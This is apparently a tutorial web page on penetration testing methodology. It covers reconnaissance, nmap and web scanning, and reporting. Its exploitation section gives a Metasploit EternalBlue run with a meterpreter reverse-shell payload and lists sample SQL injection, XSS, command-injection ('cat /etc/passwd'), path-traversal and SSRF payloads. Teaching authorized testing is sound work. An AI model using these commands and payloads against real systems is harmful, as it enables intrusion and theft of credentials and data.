Penetration Testing Methodology: Complete Guide

What is Penetration Testing?
The 5 Phases of Pentesting
Reconnaissance Techniques
Scanning & Enumeration
Exploitation
Reporting

Legal Disclaimer

Only perform penetration testing on systems you own or have explicit written authorization to test. Unauthorized hacking is illegal.

What is Penetration Testing?

Penetration testing (pentesting) is a simulated cyber attack against your computer system to check for exploitable vulnerabilities. Unlike vulnerability assessments, pentests attempt to actively exploit weaknesses.

Types of Pentests

Black Box: Tester has no prior knowledge of the system
White Box: Full knowledge (source code, architecture)
Gray Box: Partial knowledge (user credentials)

The 5 Phases of Pentesting

Reconnaissance (OSINT)

Gather information about the target without direct interaction. Use public sources like WHOIS, DNS, social media, job postings.

Scanning & Enumeration

Actively probe the target to discover open ports, services, and potential vulnerabilities.

Exploitation

Attempt to exploit discovered vulnerabilities to gain unauthorized access.

Post-Exploitation

Maintain access, escalate privileges, pivot to other systems, exfiltrate data.

Reporting

Document findings with severity ratings and remediation recommendations.

Reconnaissance Techniques

Passive Reconnaissance

# WHOIS Lookup
whois example.com

# DNS Enumeration
dig example.com ANY
dig +short mx example.com

# Subdomain Discovery
subfinder -d example.com -o subdomains.txt

# Google Dorking
site:example.com filetype:pdf
site:example.com inurl:admin
site:example.com "password" OR "credentials"

OSINT Tools

theHarvester: Email, subdomain, IP discovery
Shodan: Search for internet-connected devices
Maltego: Visual link analysis
Recon-ng: Modular reconnaissance framework

Scanning & Enumeration

Nmap Scanning

# Quick TCP Scan
nmap -sV -sC -O -oA scan_results 192.168.1.0/24

# Full Port Scan
nmap -p- -T4 -A -v target.com

# UDP Scan
nmap -sU --top-ports 100 target.com

# Vulnerability Scan
nmap --script vuln target.com

Web Application Scanning

# Directory Brute Force
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt

# Nikto Web Scanner
nikto -h http://target.com

# WPScan (WordPress)
wpscan --url http://target.com --enumerate u,vp,vt

Exploitation

Metasploit Framework

# Start Metasploit
msfconsole

# Search for exploits
search type:exploit platform:windows smb

# Use an exploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
exploit

Common Vulnerabilities to Test

SQL Injection	`' OR '1'='1`
XSS	`<script>alert(1)</script>`
Command Injection	`; cat /etc/passwd`
Path Traversal	`../../../etc/passwd`
SSRF	`http://169.254.169.254/`

Reporting

A professional pentest report includes:

Executive Summary: High-level overview for management
Scope: What was tested
Methodology: Tools and techniques used
Findings: Each vulnerability with severity (CVSS), evidence, remediation
Conclusion: Overall security posture assessment

CVSS Severity Scale

0.0 None
0.1-3.9 Low
4.0-6.9 Medium
7.0-8.9 High
9.0-10.0 Critical

Updated: December 2024

Penetration Testing Methodology

Table of Contents

Legal Disclaimer

What is Penetration Testing?

Types of Pentests

The 5 Phases of Pentesting

Reconnaissance (OSINT)

Scanning & Enumeration

Exploitation

Post-Exploitation

Reporting

Reconnaissance Techniques

Passive Reconnaissance

OSINT Tools

Scanning & Enumeration

Nmap Scanning

Web Application Scanning

Exploitation

Metasploit Framework

Common Vulnerabilities to Test

Reporting

CVSS Severity Scale